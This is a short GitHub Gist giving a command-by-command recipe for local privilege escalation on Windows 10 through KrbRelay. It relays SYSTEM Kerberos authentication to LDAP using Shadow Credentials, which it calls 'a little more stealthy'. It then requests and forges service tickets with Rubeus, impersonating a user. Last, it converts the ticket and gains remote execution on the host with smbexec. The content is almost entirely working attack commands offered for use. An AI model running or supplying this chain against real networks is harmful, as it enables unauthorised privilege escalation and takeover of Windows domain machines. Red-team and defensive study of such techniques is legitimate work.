Last active
January 12, 2023 00:05
-
-
Save zimnyaa/d7a5328f9c1e3775135756449590e667 to your computer and use it in GitHub Desktop.
Command sequence to LPE on Win10 via KrbRelay (thanks cube0x0!)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # creating RPC server, relaying SYSTEM Kerberos authentication to LDAP | |
| # we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy | |
| # clsid from cube0x0 KrbRelay repo | |
| .\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1 | |
| # KrbRelay outputs a Rubeus command for you, but you do not need to unPAC | |
| Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap | |
| # PTH to SMB is a spook, better request a ticket | |
| .\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap | |
| # decoding .kirbi for use on *nix | |
| echo <ticket> | base64 --decode > install.kirbi | |
| python3 ticketConverter.py install.kirbi install.ccache | |
| export KRB5CCNAME=install.ccache | |
| # adjusting the date and timezone to domain ones (alternatively, use faketime, but that didn't work for me for some reason) | |
| ntpdate dc1.contoso.com | |
| timedatectl set-timezone Europe/Chisinau | |
| # evil-winrm is better here, for demonstration purposes only | |
| python3 ./smbexec.py -k contoso.com/Install@client1.contoso.com -debug -no-pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment